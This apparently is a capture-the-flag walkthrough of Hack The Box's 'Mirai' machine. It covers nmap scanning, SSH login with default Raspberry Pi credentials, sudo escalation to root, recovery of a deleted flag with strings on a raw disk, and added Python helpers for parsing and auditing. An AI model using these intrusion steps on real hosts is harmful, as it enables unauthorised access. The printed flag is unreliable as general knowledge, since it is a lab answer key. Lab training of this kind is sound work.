
hack the box walkthrough – Mirai machine
New easy Linux HTB machine today: Mirai!
The listed difficulty is easy... let's find out.

enumeration
We won't break an old habit now: let's start with our nmapAutomator scan:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.82.188 Full
Running a Full scan on 10.129.82.188
Host is likely running Linux
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:41 EST
Initiating Parallel DNS resolution of 1 host. at 16:41
Completed Parallel DNS resolution of 1 host. at 16:41, 0.01s elapsed
Initiating Connect Scan at 16:41
Scanning 10.129.82.188 [65535 ports]
Discovered open port 22/tcp on 10.129.82.188
Discovered open port 53/tcp on 10.129.82.188
Discovered open port 80/tcp on 10.129.82.188
Warning: 10.129.82.188 giving up on port because retransmission cap hit (1).
Discovered open port 32400/tcp on 10.129.82.188
Connect Scan Timing: About 23.03% done; ETC: 16:43 (0:01:44 remaining)
Connect Scan Timing: About 44.31% done; ETC: 16:43 (0:01:17 remaining)
Discovered open port 1450/tcp on 10.129.82.188
Connect Scan Timing: About 67.48% done; ETC: 16:43 (0:00:44 remaining)
Discovered open port 32469/tcp on 10.129.82.188
Completed Connect Scan at 16:43, 136.87s elapsed (65535 total ports)
Nmap scan report for 10.129.82.188
Host is up (0.025s latency).
Not shown: 65089 closed ports, 440 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1450/tcp open dwf
32400/tcp open plex
32469/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.95 seconds
Making a script scan on extra ports: 1450, 32400, 32469
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:43 EST
Nmap scan report for 10.129.82.188
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
1450/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds
---------------------Finished all Nmap scans---------------------
Completed in 2 minute(s) and 30 second(s)
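The two scans above are the usual pair: a full-port sweep that only guesses services from port numbers (1450 shows up as "dwf", 32400 as "plex"), then a version scan on the unusual ports that replaces those guesses with what the banner actually says. The parser below is an added example, not part of the post or of nmapAutomator; it reads nmap's normal (non-XML) output, merges a port's later version line over its earlier guess, attaches NSE script lines to their port, and lists the open ports that still have no version string so they are not forgotten. The sample input is the post's own output pasted verbatim.

```python
import re

# Sample input, pasted from the two nmap runs in the post above: the full-port
# table and the follow-up version scan on the extra ports (nmap "normal" output).
NMAP_OUTPUT = r"""PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1450/tcp open dwf
32400/tcp open plex
32469/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 136.95 seconds
PORT STATE SERVICE VERSION
1450/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
"""

# "port/proto state service [version...]"; version is absent in a plain port scan
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)
# NSE script output hangs below a port line and starts with "|" or "|_"
SCRIPT_LINE = re.compile(r"^\|_?\s*(?P<body>.*)$")


def parse_nmap(text):
    """Parse nmap normal output into {(port, proto): {...}}.  When the same port
    appears twice (port scan, then -sV), the later line overwrites the earlier
    service guess and attaches the version string; script lines are collected."""
    ports = {}
    current = None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            key = (int(m["port"]), m["proto"])
            current = ports.setdefault(key, {"version": None, "scripts": []})
            current["state"] = m["state"]
            current["service"] = m["service"]
            if m["version"]:
                current["version"] = m["version"].strip()
            continue
        s = SCRIPT_LINE.match(line)
        if s and current is not None:
            current["scripts"].append(s["body"].strip())
        else:
            current = None      # any other line ends the script block
    return ports


def open_ports(ports):
    """Sorted list of open port numbers."""
    return sorted(p for (p, _), info in ports.items() if info["state"] == "open")


def unidentified(ports):
    """Open ports whose service is still only a port-number guess (no version
    string), i.e. the ones that still need a targeted -sV or a manual look."""
    return sorted(p for (p, _), info in ports.items()
                  if info["state"] == "open" and info["version"] is None)


if __name__ == "__main__":
    scan = parse_nmap(NMAP_OUTPUT)
    for (port, proto), info in sorted(scan.items()):
        print(f"{port}/{proto} {info['state']} {info['service']} {info['version'] or ''}")
    print("still unidentified:", unidentified(scan))
```

On the post's output this reports 22, 53 and 80 as still unidentified, which matches what nmapAutomator did: it only version-scanned the "extra" ports, so the web server on 80 was never fingerprinted and had to be looked at by hand.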
We have quite a few ports open on this machine.
Let's start with port 80. When I opened it in the web browser I got a blank page, so I ran dirbuster to check whether any files or folders could be found.

The admin folder brings me to a Pi-hole dashboard.

Thanks to Google, I found the default SSH credentials: pi/raspberry.
[email protected]:~$ ssh pi@h10.129.82.188
ssh: Could not resolve hostname h10.129.82.188: Name or service not known
[email protected]:~$ ssh pi@10.129.82.188
pi@10.129.82.188's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
[email protected]:~ $ whoami
pi
Privilege Escalation
A linpeas scan showed me that the user pi is a member of the sudo group and that I can use /tmp/shrndom with the sudo tokens exploit for privilege escalation.
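Whatever route is taken, what makes the jump to root possible here is the sudo policy: pi can run commands as root through sudo. The audit script below is an added example, written for this walkthrough and not taken from the post or from linpeas. It parses a sudoers file and an /etc/group excerpt (both constructed samples; the `pi ALL=(ALL) NOPASSWD: ALL` line is modelled on the drop-in file Raspberry Pi OS ships as /etc/sudoers.d/010_pi-nopasswd) and reports every rule that gives a user unrestricted root, flagging the ones that skip the password prompt.

```python
import re

# Constructed sample sudoers: the stock Debian rules plus the Raspberry Pi OS
# drop-in (modelled on /etc/sudoers.d/010_pi-nopasswd). Not copied from the box.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
pi ALL=(ALL) NOPASSWD: ALL
%backup ALL=(root) NOPASSWD: /usr/bin/rsync   # scoped rule, not ALL
"""

# Constructed /etc/group excerpt: pi is in sudo, james is not.
SAMPLE_GROUP = """\
sudo:x:27:pi
backup:x:34:james
"""

# who  host = (runas) [TAG: ...] commands     (aliases and Defaults are skipped)
USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_user_specs(sudoers_text):
    """Return the user/group specifications of a sudoers file as dicts."""
    specs = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith(("Defaults", "User_Alias", "Runas_Alias",
                                         "Host_Alias", "Cmnd_Alias")):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        specs.append({
            "who": m["who"],
            "runas": m["runas"] or "root",
            "nopasswd": "NOPASSWD" in tags,
            "cmds": [c.strip() for c in m["cmds"].split(",")],
        })
    return specs


def parse_groups(group_text):
    """Map group name -> set of member users from /etc/group content."""
    groups = {}
    for line in group_text.splitlines():
        if not line.strip():
            continue
        name, _, _, members = line.split(":", 3)
        groups[name] = {u for u in members.split(",") if u}
    return groups


def audit_user(sudoers_text, group_text, user):
    """Return the rules that let `user` run ALL commands, directly or through a
    %group, and whether each one skips the password prompt."""
    groups = parse_groups(group_text)
    findings = []
    for spec in parse_user_specs(sudoers_text):
        who = spec["who"]
        if who.startswith("%"):
            applies = user in groups.get(who[1:], set())
        else:
            applies = who == user
        if applies and "ALL" in spec["cmds"]:
            findings.append({"rule": who, "runas": spec["runas"],
                             "nopasswd": spec["nopasswd"]})
    return findings


if __name__ == "__main__":
    for user in ("pi", "james"):
        for f in audit_user(SAMPLE_SUDOERS, SAMPLE_GROUP, user):
            tag = "NOPASSWD" if f["nopasswd"] else "password required"
            print(f"{user}: unrestricted root via rule '{f['rule']}' ({tag})")
```

On a real host the same check is `sudo -l` for one user, or this script fed the contents of /etc/sudoers and /etc/sudoers.d/*; a default account that both keeps its factory password and holds a NOPASSWD ALL rule is two findings that compound each other, and the fix is to change the password and drop the NOPASSWD drop-in.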


[email protected]:~ $ sudo /tmp/shrndom
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cd /root
# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Where is my flag?
Oh ok... I thought I was done here.
A new linpeas scan showed me the disk mounted on /media/usbstick.

# cd /media/usbstick
# ls -al
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Oh god... what have you done, James?
So I ran the following command to recover the root.txt file:
# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
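Why `strings` on the raw device works: deleting a file on an ext filesystem removes the directory entry and marks the inode and data blocks free, but nothing zeroes the blocks, so the file's bytes sit on the device until something reuses them. The script below is an added example, not part of the post; it reimplements the `strings -t d` scan with offsets over a constructed image that stands in for /dev/sdb (with ">r &"-style binary noise like the output above and a constructed, clearly fake 32-hex flag), filters the hits down to flag-shaped tokens, and reads a real device in chunks without cutting a string in two at a chunk boundary.

```python
import os
import re
import tempfile

# Constructed raw-device image standing in for /dev/sdb. The directory block
# still names root.txt, and the file's data block survives the unlink. The
# ">r &" / "2]8^" bytes mimic the binary noise seen in the post's strings output.
NOISE = b">r &" + b"\x00" * 7 + b"2]8^"
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"/media/usbstick\x00" + NOISE
    + b"lost+found\x00" + b"root.txt\x00" + b"damnit.txt\x00" + NOISE
    + b"\x00" * 128
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + b"\x00" * 1024
    + b"0123456789abcdef0123456789abcdef\n"   # constructed flag-shaped content
    + b"\x00" * 64
)


def find_strings(data, min_len=4):
    """Return (offset, text) for every run of printable ASCII at least min_len
    long, like `strings -t d` (4 is strings' default minimum)."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pat.finditer(data)]


def carve_flag_like(data, min_len=4):
    """Keep only 32-hex-digit tokens (the shape of an HTB flag / MD5 digest),
    returning (absolute offset, token) so the hit can be located with dd."""
    hexpat = re.compile(r"\b[0-9a-f]{32}\b")
    return [(off + m.start(), m.group())
            for off, s in find_strings(data, min_len)
            for m in hexpat.finditer(s)]


def read_device_strings(path, min_len=4, chunk=1 << 20):
    """find_strings over a block device or image without loading it whole; a
    printable run cut by a chunk boundary is carried into the next chunk."""
    results, carry, base = [], b"", 0
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                break
            data = carry + buf
            start = base - len(carry)
            # trailing printable run may continue in the next chunk: hold it back
            tail = re.search(rb"[\x20-\x7e]*\Z", data).group()
            head = data[: len(data) - len(tail)]
            results += [(start + off, s) for off, s in find_strings(head, min_len)]
            carry, base = tail, base + len(buf)
    results += [(base - len(carry) + off, s) for off, s in find_strings(carry, min_len)]
    return results


def demo_roundtrip(chunk=100):
    """Write SAMPLE_IMAGE to a temp file and check the chunked scan (with a
    deliberately tiny chunk that splits 'lost+found') matches the in-memory scan."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(SAMPLE_IMAGE)
        path = tmp.name
    try:
        return read_device_strings(path, chunk=chunk) == find_strings(SAMPLE_IMAGE)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for off, s in find_strings(SAMPLE_IMAGE):
        print(f"{off:8d} {s}")
    print("flag-shaped hits:", carve_flag_like(SAMPLE_IMAGE))
    print("chunked scan consistent:", demo_roundtrip())
```

Raising `min_len` to 5 drops the ">r &" and "2]8^" noise while keeping the file names and content, which is the quick way to tidy the output above. The same property that makes this recovery possible is what a defender has to remember when a stick or disk changes hands: deleting is not wiping, and only overwriting the blocks (or full-disk encryption from the start) makes the data unrecoverable.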